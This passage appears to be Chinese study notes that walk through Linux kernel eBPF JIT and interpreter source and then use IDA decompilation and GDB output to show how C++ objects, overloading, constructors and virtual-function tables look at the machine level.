  • 函数 bpf_prog_load 会调用 bpf_prog_select_runtime 函数来判断是否使用 JIT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
struct bpf_prog *bpf_prog_select_runtime(struct bpf_prog *fp, int *err)
{
if (fp->bpf_func)
goto finalize;

bpf_prog_select_func(fp);

if (!bpf_prog_is_dev_bound(fp->aux)) {
*err = bpf_prog_alloc_jited_linfo(fp);
if (*err)
return fp;

fp = bpf_int_jit_compile(fp); /* 判断是否需要将eBPF字节码编译成机器码 */
if (!fp->jited) {
bpf_prog_free_jited_linfo(fp);
#ifdef CONFIG_BPF_JIT_ALWAYS_ON
*err = -ENOTSUPP;
return fp;
#endif
} else {
bpf_prog_free_unused_jited_linfo(fp);
}
} else {
*err = bpf_prog_offload_compile(fp);
if (*err)
return fp;
}

finalize:
bpf_prog_lock_ro(fp);

*err = bpf_check_tail_call(fp);

return fp;
}
EXPORT_SYMBOL_GPL(bpf_prog_select_runtime);
  • 对于不同的架构,函数 bpf_int_jit_compile 有不同的实现
  • 这里我们只分析 x86_64 架构下的 bpf_int_jit_compile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
{
struct bpf_binary_header *header = NULL;
struct bpf_prog *tmp, *orig_prog = prog;
struct x64_jit_data *jit_data;
int proglen, oldproglen = 0;
struct jit_context ctx = {};
bool tmp_blinded = false;
bool extra_pass = false;
u8 *image = NULL;
int *addrs;
int pass;
int i;

if (!prog->jit_requested) /* 判断是否支持jit */
return orig_prog;

tmp = bpf_jit_blind_constants(prog);
/*
* If blinding was requested and we failed during blinding,
* we must fall back to the interpreter.
*/
if (IS_ERR(tmp))
return orig_prog;
if (tmp != prog) {
tmp_blinded = true;
prog = tmp;
}

jit_data = prog->aux->jit_data;
if (!jit_data) {
jit_data = kzalloc(sizeof(*jit_data), GFP_KERNEL);
if (!jit_data) {
prog = orig_prog;
goto out;
}
prog->aux->jit_data = jit_data;
}
addrs = jit_data->addrs;
if (addrs) {
ctx = jit_data->ctx;
oldproglen = jit_data->proglen;
image = jit_data->image;
header = jit_data->header;
extra_pass = true;
goto skip_init_addrs;
}
addrs = kmalloc_array(prog->len + 1, sizeof(*addrs), GFP_KERNEL);
if (!addrs) {
prog = orig_prog;
goto out_addrs;
}

/*
* Before first pass, make a rough estimation of addrs[]
* each BPF instruction is translated to less than 64 bytes
*/
for (proglen = 0, i = 0; i <= prog->len; i++) {
proglen += 64;
addrs[i] = proglen;
}
ctx.cleanup_addr = proglen;
skip_init_addrs:

/*
* JITed image shrinks with every pass and the loop iterates
* until the image stops shrinking. Very large BPF programs
* may converge on the last pass. In such case do one more
* pass to emit the final image.
*/
for (pass = 0; pass < 20 || image; pass++) {
proglen = do_jit(prog, addrs, image, oldproglen, &ctx); /* 将eBPF字节码编译成本地机器码 */
if (proglen <= 0) {
out_image:
image = NULL;
if (header)
bpf_jit_binary_free(header);
prog = orig_prog;
goto out_addrs;
}
if (image) {
if (proglen != oldproglen) {
pr_err("bpf_jit: proglen=%d != oldproglen=%d\n",
proglen, oldproglen);
goto out_image;
}
break;
}
if (proglen == oldproglen) {
u32 align = __alignof__(struct exception_table_entry);
u32 extable_size = prog->aux->num_exentries *
sizeof(struct exception_table_entry);

/* allocate module memory for x86 insns and extable */
header = bpf_jit_binary_alloc(roundup(proglen, align) + extable_size,
&image, align, jit_fill_hole);
if (!header) {
prog = orig_prog;
goto out_addrs;
}
prog->aux->extable = (void *) image + roundup(proglen, align);
}
oldproglen = proglen;
cond_resched();
}

if (bpf_jit_enable > 1)
bpf_jit_dump(prog->len, proglen, pass + 1, image); /* 打印eBPF字节码编译后的机器码 */

if (image) {
if (!prog->is_func || extra_pass) {
bpf_tail_call_direct_fixup(prog);
bpf_jit_binary_lock_ro(header);
} else {
jit_data->addrs = addrs;
jit_data->ctx = ctx;
jit_data->proglen = proglen;
jit_data->image = image;
jit_data->header = header;
}
prog->bpf_func = (void *)image; /* 将eBPF执行函数设置成编译后的机器码 */
prog->jited = 1;
prog->jited_len = proglen;
} else {
prog = orig_prog;
}

if (!image || !prog->is_func || extra_pass) {
if (image)
bpf_prog_fill_jited_linfo(prog, addrs + 1);
out_addrs:
kfree(addrs);
kfree(jit_data);
prog->aux->jit_data = NULL;
}
out:
if (tmp_blinded)
bpf_jit_prog_release_other(prog, prog == orig_prog ?
tmp : orig_prog);
return prog;
}

当函数 do_jit 将 eBPF 码编译为字节码后,可以直接调用 prog->bpf_func 来执行字节码

当内核要执行 eBPF 字节码时,会调用原本位于 prog->bpf_func 的函数 __bpf_prog_run,该函数是 BPF 的核心函数入口,该函数被多个不同 stack size 的函数调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn, u64 *stack)
{
#define BPF_INSN_2_LBL(x, y) [BPF_##x | BPF_##y] = &&x##_##y
#define BPF_INSN_3_LBL(x, y, z) [BPF_##x | BPF_##y | BPF_##z] = &&x##_##y##_##z
static const void * const jumptable[256] __annotate_jump_table = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */
BPF_INSN_MAP(BPF_INSN_2_LBL, BPF_INSN_3_LBL),
/* Non-UAPI available opcodes. */
[BPF_JMP | BPF_CALL_ARGS] = &&JMP_CALL_ARGS,
[BPF_JMP | BPF_TAIL_CALL] = &&JMP_TAIL_CALL,
[BPF_LDX | BPF_PROBE_MEM | BPF_B] = &&LDX_PROBE_MEM_B,
[BPF_LDX | BPF_PROBE_MEM | BPF_H] = &&LDX_PROBE_MEM_H,
[BPF_LDX | BPF_PROBE_MEM | BPF_W] = &&LDX_PROBE_MEM_W,
[BPF_LDX | BPF_PROBE_MEM | BPF_DW] = &&LDX_PROBE_MEM_DW,
}; /* 维护了一个跳表,根据opcode来进行跳转 */
#undef BPF_INSN_3_LBL
#undef BPF_INSN_2_LBL
u32 tail_call_cnt = 0;

#define CONT ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

select_insn:
goto *jumptable[insn->code];

/* ALU */
#define ALU(OPCODE, OP) \
ALU64_##OPCODE##_X: \
DST = DST OP SRC; \
CONT; \
ALU_##OPCODE##_X: \
DST = (u32) DST OP (u32) SRC; \
CONT; \
ALU64_##OPCODE##_K: \
DST = DST OP IMM; \
CONT; \
ALU_##OPCODE##_K: \
DST = (u32) DST OP (u32) IMM; \
CONT;

ALU(ADD, +)
ALU(SUB, -)
ALU(AND, &)
ALU(OR, |)
ALU(LSH, <<)
ALU(RSH, >>)
ALU(XOR, ^)
ALU(MUL, *)
#undef ALU
ALU_NEG:
DST = (u32) -DST;
CONT;
ALU64_NEG:
DST = -DST;
CONT;
ALU_MOV_X:
DST = (u32) SRC;
CONT;
ALU_MOV_K:
DST = (u32) IMM;
CONT;
ALU64_MOV_X:
DST = SRC;
CONT;
ALU64_MOV_K:
DST = IMM;
CONT;
LD_IMM_DW:
DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
insn++;
CONT;
ALU_ARSH_X:
DST = (u64) (u32) (((s32) DST) >> SRC);
CONT;
ALU_ARSH_K:
DST = (u64) (u32) (((s32) DST) >> IMM);
CONT;
ALU64_ARSH_X:
(*(s64 *) &DST) >>= SRC;
CONT;
ALU64_ARSH_K:
(*(s64 *) &DST) >>= IMM;
CONT;
ALU64_MOD_X:
div64_u64_rem(DST, SRC, &AX);
DST = AX;
CONT;
ALU_MOD_X:
AX = (u32) DST;
DST = do_div(AX, (u32) SRC);
CONT;
ALU64_MOD_K:
div64_u64_rem(DST, IMM, &AX);
DST = AX;
CONT;
ALU_MOD_K:
AX = (u32) DST;
DST = do_div(AX, (u32) IMM);
CONT;
ALU64_DIV_X:
DST = div64_u64(DST, SRC);
CONT;
ALU_DIV_X:
AX = (u32) DST;
do_div(AX, (u32) SRC);
DST = (u32) AX;
CONT;
ALU64_DIV_K:
DST = div64_u64(DST, IMM);
CONT;
ALU_DIV_K:
AX = (u32) DST;
do_div(AX, (u32) IMM);
DST = (u32) AX;
CONT;
ALU_END_TO_BE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_be16(DST);
break;
case 32:
DST = (__force u32) cpu_to_be32(DST);
break;
case 64:
DST = (__force u64) cpu_to_be64(DST);
break;
}
CONT;
ALU_END_TO_LE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_le16(DST);
break;
case 32:
DST = (__force u32) cpu_to_le32(DST);
break;
case 64:
DST = (__force u64) cpu_to_le64(DST);
break;
}
CONT;

/* CALL */
JMP_CALL:
/* Function call scratches BPF_R1-BPF_R5 registers,
* preserves BPF_R6-BPF_R9, and stores return value
* into BPF_R0.
*/
BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3,
BPF_R4, BPF_R5);
CONT;

JMP_CALL_ARGS:
BPF_R0 = (__bpf_call_base_args + insn->imm)(BPF_R1, BPF_R2,
BPF_R3, BPF_R4,
BPF_R5,
insn + insn->off + 1);
CONT;

JMP_TAIL_CALL: {
struct bpf_map *map = (struct bpf_map *) (unsigned long) BPF_R2;
struct bpf_array *array = container_of(map, struct bpf_array, map);
struct bpf_prog *prog;
u32 index = BPF_R3;

if (unlikely(index >= array->map.max_entries))
goto out;
if (unlikely(tail_call_cnt > MAX_TAIL_CALL_CNT))
goto out;

tail_call_cnt++;

prog = READ_ONCE(array->ptrs[index]);
if (!prog)
goto out;

/* ARG1 at this point is guaranteed to point to CTX from
* the verifier side due to the fact that the tail call is
* handled like a helper, that is, bpf_tail_call_proto,
* where arg1_type is ARG_PTR_TO_CTX.
*/
insn = prog->insnsi;
goto select_insn;
out:
CONT;
}
JMP_JA:
insn += insn->off;
CONT;
JMP_EXIT:
return BPF_R0;
/* JMP */
#define COND_JMP(SIGN, OPCODE, CMP_OP) \
JMP_##OPCODE##_X: \
if ((SIGN##64) DST CMP_OP (SIGN##64) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_X: \
if ((SIGN##32) DST CMP_OP (SIGN##32) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP_##OPCODE##_K: \
if ((SIGN##64) DST CMP_OP (SIGN##64) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_K: \
if ((SIGN##32) DST CMP_OP (SIGN##32) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT;
COND_JMP(u, JEQ, ==)
COND_JMP(u, JNE, !=)
COND_JMP(u, JGT, >)
COND_JMP(u, JLT, <)
COND_JMP(u, JGE, >=)
COND_JMP(u, JLE, <=)
COND_JMP(u, JSET, &)
COND_JMP(s, JSGT, >)
COND_JMP(s, JSLT, <)
COND_JMP(s, JSGE, >=)
COND_JMP(s, JSLE, <=)
#undef COND_JMP
/* STX and ST and LDX*/
#define LDST(SIZEOP, SIZE) \
STX_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = SRC; \
CONT; \
ST_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = IMM; \
CONT; \
LDX_MEM_##SIZEOP: \
DST = *(SIZE *)(unsigned long) (SRC + insn->off); \
CONT;

LDST(B, u8)
LDST(H, u16)
LDST(W, u32)
LDST(DW, u64)
#undef LDST
#define LDX_PROBE(SIZEOP, SIZE) \
LDX_PROBE_MEM_##SIZEOP: \
bpf_probe_read_kernel(&DST, SIZE, (const void *)(long) (SRC + insn->off)); \
CONT;
LDX_PROBE(B, 1)
LDX_PROBE(H, 2)
LDX_PROBE(W, 4)
LDX_PROBE(DW, 8)
#undef LDX_PROBE

STX_XADD_W: /* lock xadd *(u32 *)(dst_reg + off16) += src_reg */
atomic_add((u32) SRC, (atomic_t *)(unsigned long)
(DST + insn->off));
CONT;
STX_XADD_DW: /* lock xadd *(u64 *)(dst_reg + off16) += src_reg */
atomic64_add((u64) SRC, (atomic64_t *)(unsigned long)
(DST + insn->off));
CONT;

default_label:
/* If we ever reach this, we have a bug somewhere. Die hard here
* instead of just returning 0; we could be somewhere in a subprog,
* so execution could continue otherwise which we do /not/ want.
*
* Note, verifier whitelists all opcodes in bpf_opcode_in_insntable().
*/
pr_warn("BPF interpreter: unknown opcode %02x\n", insn->code);
BUG_ON(1);
return 0;
}

cpp 对象

C++ 的每一个成员函数在 class 中声明,但是却不出现在每个对象中:

  • 每一个非内联的成员函数,只会诞生一个函数实例
  • 每个内联函数,会在其每一个使用者身上产生一个函数实例

C++ 的类就相当于一个数据结构体加上多个函数:

1
Class = data structure + code (methods)

This 指针

This 指针就是指向实例对象自己的指针

案例一:This 的使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#include<iostream>
#include<string.h>
using namespace std;

class Base{
public:
void fun(){
cout<<name<<endl;
}
char name[8];
};

class A : public Base{
public:
void foo(){
strcpy(this->name,"A");
this->fun(); // 相当于fun
}
};

class B : public Base{
public:
void foo(){
strcpy(this->name,"B");
this->fun();
}
};

int main(void){
A *a = new A();
B *b = new B();
a->foo();
b->foo();
}
  • 在调用类函数时,会将其 new 出来的堆内存当做第一个参数传入(相当于传入了该对象的数据结构体)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rax
B *v4; // rax
A *a; // [rsp+0h] [rbp-10h]
B *b; // [rsp+8h] [rbp-8h]

v3 = (A *)operator new(8uLL);
*v3 = 0LL;
a = v3;
v4 = (B *)operator new(8uLL);
*v4 = 0LL;
b = v4;
A::foo(a);
B::foo(b);
return 0;
}
  • 使用 This 指针,可以快速操控本实例对象的各个成员:
1
2
3
4
5
void __cdecl A::foo(A *const this)
{
*(_WORD *)this->name = 65; // 编译器优化了
Base::fun(this);
}

重载

C++ 允许在同一作用域中的某个函数和运算符指定多个定义,分别称为:

  • 函数重载
  • 运算符重载

函数重载:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <iostream>
using namespace std;

class Test{
public:
void print(int i) {
cout<<"int:"<<i<<endl;
}
void print(double f) {
cout<<"double:"<<f<<endl;
}
};

int main(void)
{
Test *t = new Test;
t->print(1);
t->print(1.1);
}
  • 对于类函数来说,编译器会把 [类名称,函数名称,参数列表] 放入哈希函数转化为一个哈希值,并用这个哈希值来当做函数的名称:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near

f= qword ptr -18h
t= qword ptr -8

; __unwind {
push rbp
mov rbp, rsp
sub rsp, 20h
mov edi, 1 ; unsigned __int64
call __Znwm ; operator new(ulong)
mov [rbp+t], rax
mov rax, [rbp+t]
mov esi, 1 ; i
mov rdi, rax ; this
call _ZN4Test5printEi ; Test::print(int)
mov rdx, cs:qword_2018
mov rax, [rbp+t]
mov [rbp+f], rdx
movsd xmm0, [rbp+f] ; f
mov rdi, rax ; this
call _ZN4Test5printEd ; Test::print(double)
mov eax, 0
leave
retn
; } // starts at 11BA
main endp
  • 在汇编代码中,程序调用的函数已经确定
  • 那么编译器可能是在语法分析时,就通过参数列表确定了应该调用的函数

运算符重载(内部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#include <iostream>
using namespace std;

class Box
{
public:
double getVolume(void){
return length * breadth * height;
}
void setAll(double len,double bre,double hei){
length = len;
breadth = bre;
height = hei;
}
Box operator + (const Box& b){ /* 重载运算符'+'(只有'+'两边都是Box类型时,才会触发该函数) */
Box box;
box.length = this->length + b.length;
box.breadth = this->breadth + b.breadth;
box.height = this->height + b.height;
return box;
}
double length;
double breadth;
double height;
};

int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume();
volume = Box2.getVolume();
Box3 = Box1 + Box2;
volume = Box3.getVolume();

return 0;
}
  • 在一个类中重载运算符过后,其作用范围为整个文件,以及引入该类的其他文件
  • 本质上重载运算符就是调用对应的函数(其参数和返回值必须符合条件)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
Box::operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl Box::operator+(Box *retstr, Box *const this, const Box *b)
{
retstr->length = b->length + this->length;
retstr->breadth = b->breadth + this->breadth;
retstr->height = b->height + this->height;
return retstr;
}
  • PS:Cpp 库中也有许多运算符重载的案例:new<<>>

运算符重载(外部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
using namespace std;

class Box
{
public:
double getVolume(void){
return length * breadth * height;
}
void setAll(double len,double bre,double hei){
length = len;
breadth = bre;
height = hei;
}
double length;
double breadth;
double height;
};

Box operator + (const Box& a,const Box& b){
Box box;
box.length = a.length + b.length;
box.breadth = a.breadth + b.breadth;
box.height = a.height + b.height;
return box;
}

int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume();
volume = Box2.getVolume();
Box3 = Box1 + Box2;
volume = Box3.getVolume();

return 0;
}
  • 在全局重载运算符过后,其作用范围就是全局(但可以被命名空间限制)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl operator+(Box *retstr, const Box *a, const Box *b)
{
retstr->length = b->length + a->length;
retstr->breadth = b->breadth + a->breadth;
retstr->height = b->height + a->height;
return retstr;
}

内联函数

在类的声明内部声明和定义的函数叫做内联成员函数

  • 内联函数类似于宏函数,但内联函数是在编译时展开,而宏在预编译时展开
  • 内联函数的定义和使用必须在同一文件,因此最好将内联函数定义放在头文件中

定义在类中的成员函数默认都是内联的,类外定义则要加上 inline(类的成员函数是指那些把定义和原型写在类定义内部的函数)

1
2
3
4
5
6
7
class Test{
public:
void setA(int _a); // 普通函数
void setB(int _b){b = _b;} // 隐式的内联函数
inline void setC(int _c); // 显式的内联函数
int a,b,c;
};
  • 在 IDA 中分析或者在 GDB 中调试,都发现函数没有内联成功(还是当成普通文件来调用),可能是编译器的原因

构造函数

以下几种情况下,会合成有用的构造函数:

  • 带有默认构造函数的成员对象(例如:string 类)
  • 一个派生类的父类带有构造函数(或者父类的成员对象带有默认构造函数),那么子类:
    • 如果没有定义构造函数,则会合成默认构造函数
    • 如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数
  • 带有一个虚函数的类
    • 类声明(或继承)一个虚函数
    • 类派生自一个继承串链,其中有一个或更多的虚基类

案例一:带有默认构造函数的成员对象

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <iostream>  
#include <string>

using namespace std;

class Test
{
public:
string name;
};

int main(int argc, char* argv[])
{
Test t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test t; // [rsp+10h] [rbp-40h] BYREF
unsigned __int64 v5; // [rsp+38h] [rbp-18h]

v5 = __readfsqword(0x28u);
Test::Test(&t);
Test::~Test(&t);
return 0;
}
  • 由于 Test 类中的 string 类带有默认构造函数,因此 Test 类会合成一个构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
std::string::basic_string(this);
}

案例二:没有定义构造函数,则会合成默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>  
#include <string>

using namespace std;

class Test1{
public:
Test1();
};

class Test2 : public Test1{

};

Test1::Test1(void){
cout << "Test1" << endl;
}

int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于 Test2 没有构造函数,但父类 Test1 有构造函数,因此在 Test2 的构造函数中会调用 Test1 的构造函数:
1
2
3
4
void __cdecl Test2::Test2(Test2 *const this)
{
Test1::Test1(this);
}

案例三:如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>  
#include <string>

using namespace std;

class Test1{
public:
Test1();
};

class Test2 : public Test1{
public:
Test2();
};

Test1::Test1(void){
cout << "Test1" << endl;
}

Test2::Test2(void){
cout << "Test2" << endl;
}

int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于在 Test2 的构造函数中没有调用父类 Test1 的构造函数,因此编译器会自动加上 Test2 的构造函数:
1
2
3
4
5
6
7
8
void __cdecl Test2::Test2(Test2 *const this)
{
__int64 v1; // rax

Test1::Test1(this);
v1 = std::operator<<<std::char_traits<char>>(&std::cout, "Test2");
std::ostream::operator<<(v1, &std::endl<char,std::char_traits<char>>);
}

案例四:带有一个虚函数的类

  • 源代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include<iostream>
using namespace std;

class Test{
public:
virtual void foo(){
cout<<"Test::foo() is called"<<endl;
}
};

int main(void){
Test *t = new Test();
t->foo();
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test *v3; // rbx

v3 = (Test *)operator new(8uLL);
v3->_vptr_Test = 0LL;
Test::Test(v3);
(*v3->_vptr_Test)(v3, argv);
return 0;
}
  • 由于 Test 中有虚函数,因此编译器会自动为其生成构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
this->_vptr_Test = (int (**)(...))&off_3D70;
}

虚函数

面向对象的语言有三大特性:继承、封装、多态,虚函数就是 cpp 实现多态的方式

  • 多态:指用相同的接口去表示不同的实现

案例一:使用虚函数实现多态

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include<iostream>
using namespace std;

class Base{
public:
virtual void foo(){
cout<<"Base::foo() is called"<<endl;
}
};

class A:public Base{
public:
void foo(){
cout<<"A::foo() is called"<<endl;
}
};

class B:public Base{
public:
void foo(){
cout<<"B::foo() is called"<<endl;
}
};

class C:public Base{
public:
void foo(){
cout<<"C::foo() is called"<<endl;
}
};

int main(void){
Base *a = new B();
a->foo(); // B::foo() is called
((A *)a)->foo(); // B::foo() is called
return 0;
}
  • 当使用类的指针调用成员函数时:
    • 普通函数由指针类型决定
    • 虚函数由指针指向的实际类型决定
1
2
3
4
5
6
7
8
9
10
11
int __cdecl main(int argc, const char **argv, const char **envp)
{
B *v3; // rbx

v3 = (B *)operator new(8uLL);
v3->_vptr_Base = 0LL;
B::B(v3);
(*v3->_vptr_Base)(v3, argv);
(*v3->_vptr_Base)(v3);
return 0;
}
  • 这个 _vptr_Base 就是虚指针基址,它将会在对应的构造函数中进行初始化
1
2
3
4
5
void __cdecl B::B(B *const this)
{
Base::Base(this);
this->_vptr_Base = (int (**)(...))&off_3D40;
}
1
2
.data.rel.ro:0000000000003D40 8C 12 00 00 00 00 00 00       off_3D40 dq offset _ZN1B3fooEv          ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003D40 ; B::foo(void)

对于拥有虚函数的类,其每个对象均具有一个指向本类虚函数表的指针 _vptr_Base(可以将其理解为虚函数的函数指针)

案例二:虚函数的调用与虚表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include<iostream>
using namespace std;

class Base{
public:
virtual void foo1(){
cout<<"Base::foo1() is called"<<endl;
}
virtual void foo2(){
cout<<"Base::foo2() is called"<<endl;
}
virtual void foo3(){
cout<<"Base::foo3() is called"<<endl;
}
virtual void foo4(){
cout<<"Base::foo4() is called"<<endl;
}
virtual void foo5(){
cout<<"Base::foo5() is called"<<endl;
}
};

int main(void){
Base *a = new Base();
a->foo1();
a->foo2();
a->foo3();
a->foo4();
a->foo5();
}
  • cpp 底层处理虚表的方式就是强转并调用 _vptr_Base + offset
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int __cdecl main(int argc, const char **argv, const char **envp)
{
Base *v3; // rbx
Base *a; // [rsp+8h] [rbp-18h]

v3 = (Base *)operator new(8uLL);
v3->_vptr_Base = 0LL;
Base::Base(v3);
a = v3;
(*v3->_vptr_Base)(v3, argv);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 2))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 4))(a);
return 0;
}
  • 再看一个去符号的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
__int64 __fastcall main(int a1, char **a2, char **a3)
{
_QWORD *v3; // rbx
_QWORD *v5; // [rsp+8h] [rbp-18h]

v3 = (_QWORD *)operator new(8uLL);
*v3 = 0LL;
sub_13B4(v3, a2);
v5 = v3;
(*(void (__fastcall **)(_QWORD *))*v3)(v3);
(*(void (__fastcall **)(_QWORD *))(*v5 + 8LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 16LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 24LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 32LL))(v5);
return 0LL;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
5
6
.data.rel.ro:0000000000003D50 9C 12 00 00 00 00 00 00       off_3D50 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D50 ; Base::foo1(void)
.data.rel.ro:0000000000003D58 D4 12 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D60 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D68 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo4Ev ; Base::foo4(void)
.data.rel.ro:0000000000003D70 7C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo5Ev ; Base::foo5(void)
  • 用 GDB 进行调试:
1
2
3
4
5
6
pwndbg> telescope 0x55883ca88000+0x3D50
00:0000│ rdx 0x55883ca8bd50 —▸ 0x55883ca8929c (Base::foo1()) ◂— push rbp
01:00080x55883ca8bd58 —▸ 0x55883ca892d4 (Base::foo2()) ◂— push rbp
02:00100x55883ca8bd60 —▸ 0x55883ca8930c (Base::foo3()) ◂— push rbp
03:00180x55883ca8bd68 —▸ 0x55883ca89344 (Base::foo4()) ◂— push rbp
04:00200x55883ca8bd70 —▸ 0x55883ca8937c (Base::foo5()) ◂— push rbp

案例三:虚函数的继承

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
